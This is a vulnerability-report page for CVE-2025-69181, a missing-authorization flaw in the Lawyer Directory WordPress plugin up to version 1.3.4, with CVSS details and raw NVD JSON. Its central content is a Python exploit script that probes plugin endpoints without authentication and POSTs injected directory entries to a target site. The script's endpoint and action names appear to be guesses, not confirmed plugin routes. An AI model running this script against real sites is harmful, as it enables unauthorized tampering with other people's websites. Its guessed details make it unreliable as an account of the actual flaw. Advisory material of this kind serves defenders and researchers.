Security Vulnerability Report
中文
CVE-2025-69181 CVSS 7.3 HIGH

CVE-2025-69181

Published: 2026-01-22 17:16:23
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in e-plugins Lawyer Directory lawyer-directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lawyer Directory: from n/a through <= 1.3.4.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

e-plugins Lawyer Directory WordPress插件 <= 1.3.4
所有从初始版本到1.3.4的版本均受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69181 PoC - Missing Authorization in Lawyer Directory Plugin # WordPress Lawyer Directory Plugin <= 1.3.4 import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-69181""" # Endpoints that should require authorization but may be accessible without auth vulnerable_endpoints = [ f"{TARGET_URL}/wp-json/lawyer-directory/v1/lawyers", f"{TARGET_URL}/wp-json/lawyer-directory/v1/users", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=get_lawyers", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=lawyer_directory_admin" ] print("[*] Testing for Missing Authorization vulnerability...") for endpoint in vulnerable_endpoints: try: response = requests.get(endpoint, timeout=10) # If we get a successful response (not 401/403), the endpoint may be vulnerable if response.status_code == 200: print(f"[+] Potential vulnerability found at: {endpoint}") print(f" Status Code: {response.status_code}") print(f" Response Length: {len(response.text)} bytes") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[-] No obvious vulnerability detected or site may be patched") return False def exploit_authorization_bypass(): """Attempt to exploit the authorization bypass""" # Example: Try to access admin functionality without authentication exploit_payloads = [ { "url": f"{TARGET_URL}/wp-admin/admin-ajax.php", "data": { "action": "lawyer_directory_save", "lawyer_name": "Test Lawyer", "lawyer_email": "[email protected]" } }, { "url": f"{TARGET_URL}/wp-json/lawyer-directory/v1/lawyers", "method": "POST", "json": { "name": "Malicious Entry", "description": "Injected content" } } ] print("[*] Attempting exploitation...") for payload in exploit_payloads: try: if payload.get("method") == "POST": response = requests.post(payload["url"], json=payload.get("json"), timeout=10) else: response = requests.post(payload["url"], data=payload.get("data"), timeout=10) if response.status_code in [200, 201]: print(f"[!] Exploitation successful at: {payload['url']}") print(f" Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Exploitation failed: {e}") if __name__ == "__main__": print("CVE-2025-69181 - WordPress Lawyer Directory Authorization Bypass") print("="*60) check_vulnerability() exploit_authorization_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69181", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:23.377", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins Lawyer Directory lawyer-directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lawyer Directory: from n/a through <= 1.3.4."}, {"lang": "es", "value": "Vulnerabilidad de Autorización faltante en e-plugins Lawyer Directory lawyer-directory permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Lawyer Directory: desde n/a hasta &lt;= 1.3.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/lawyer-directory/vulnerability/wordpress-lawyer-directory-plugin-1-3-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}